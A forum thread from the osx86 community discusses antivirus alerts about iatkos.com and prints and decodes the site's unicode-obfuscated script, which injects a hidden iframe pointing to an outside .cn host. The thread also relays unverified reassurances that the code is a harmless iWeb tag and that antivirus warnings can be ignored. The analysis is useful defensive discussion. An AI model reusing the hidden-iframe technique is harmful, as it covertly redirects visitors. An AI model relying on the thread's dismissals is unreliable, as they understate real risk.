Beware iatkos.com

[SaintEpsilon]

This is what kaspersky told me when I tried checking out the link on uphuck.com

 

"Kaspersky Internet Security 7.0

 

The requested URL http://www.iatkos.com/ is infected with Trojan-Clicker.HTML.IFrame.bk virus"

 

Obviously I can't be sure, just using the forum to let people in the osx86 community aware of the potential danger.

[InorganicMatter]

Yep. my Clam-AV powered internet filter says:

 

The content filter has blocked the page that you have requested.

 

Web Site Address http://www.iatkos.com/

Description Virus or bad content detected. JS.Agent-6

[~pcwiz]

Uh oh. I visited that site but I didn't click on anything (I think). I'm going to contact Uphuck about this.

 

UPDATE: Just sent out an email and a PM to uphuck about this. I'm not going to visit the site till this is cleared up

[apowerr]

Hopefully this wasn't intentional

[~pcwiz]

I don't think Uphuck would do something like that but its a perfect target seeing as so many people are anticipating the release of iATKOS.

[curlyboy]

Trojan-Clicker.HTML.IFrame.bk virus

 

 

IS what i get also with zonealarm security suite

[~pcwiz]

I can't find any info on this virus. Is it serious? I visited the site 2-3 times before but my protection (various firewalls, antivirus, antispyware) didn't detect anything. Maybe this is a recent threat.

[jharleman]

It's a trojan clicker....

<a href="http://www.viruslist.com/en/virusesdescribed?chapter=153317864" class="none_green">Trojan Clickers

This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows).

 

Clickers are used:

 

• To raise the hit-count of a specific site for advertising purposes
  
• To organize a DoS attack on a specified server or site
  
• To lead the victim to an infected resource where the machine will be attacked by other malware (viruses or Trojans)
  

[chris2k]

Just read the source of the html and I think they got something to hide...

 

Quick analyze:

 

<script type="text/javascript">document.write('

\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070

\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069

\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0073\u0074

\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020

\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020

\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

 

decoded to ascii gives you:

 

<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>

 

Whatever that is...I can't tell. It redirects to google. Quite suspicious if you ask me...

 

regards,

 

chris

[~pcwiz]

Suspicious indeed. No more iatkos.com for me.

[A Nonny Moose]

Yep. my Clam-AV powered internet filter says:

 

Where is this filter? Or is it a part of ClamXAV that I don't know about?

[InorganicMatter]

Where is this filter? Or is it a part of ClamXAV that I don't know about?

 

 

The latest version of ClarkConnect has got ClamAV virus scanning built into the web cache and content filter. It's a great piece of software, and the only real requirement is two network cards. I love it!

[idividebyzero]

This can happen when the webhost gets hacked/virused, the virus implants code on every page hosted by the server. The host needs to be alerted, theres really nothing the webmaster can do if its a server wide virus.

[~pcwiz]

Important Update:

 

After publishing this story in my blog, a user commented:

 

eskurza has said it was made with iWeb. This is one of the tags the iWeb will put into a site it builds. There is nothing malicious about it.

 

I don't know why iWeb would do this but I trust this person and I think its pretty safe to say that iatkos.com is safe.

[xtraa]

Well, many AVs are hoaxing today because websites are getting more and more complex, especially if they put so much shi* in it like iWeb.

(Nothing wrong with iWeb, this is just the downside of making it that easy). So as long as you don't download or install an executeable or

plugin, it doesn't matter what AVs tells you.

[(MoC)]

IDK, I went there once. My AV didn't see anything.....

[~pcwiz]

Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.

 

I have this whole ton of security stuff installed and none of them detected anything.

[apowerr]

Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.

Bloat rly?

[Kane Adams]

lol you guys are funny..

Use firefox.........

[(MoC)]

If you use IE7 you are cursed.........LMFAOROTFL

 

It wasn't bad; but it got bloated after 6.0!

[tchow]

Very Funny. May be this guy bring the virus around the world. HA. HA. I wait two to three time a day. I have antivirus to protect my computer. I never get alert from uphuck.com

[chris2k]

Never said it was a virus. Nor do I believe it's Iwebs fault, until someone can reproduce it.

The html/author is just trying to hide something. Might be a counter, might be something else.

 

http://isc.sans.org/diary.html?date=2004-07-23

 

The *method* is quite old actually.

[~pcwiz]

I just went on iatkos.com now and nothing happened. No viruses.

 

Whatever it is, I don't think its a reason to be concerned.

[Conroe Mac]

I use special protection for viruses called Ubuntu.

[fatshitcat]

Actually, that "special protection" is the Linux kernel itself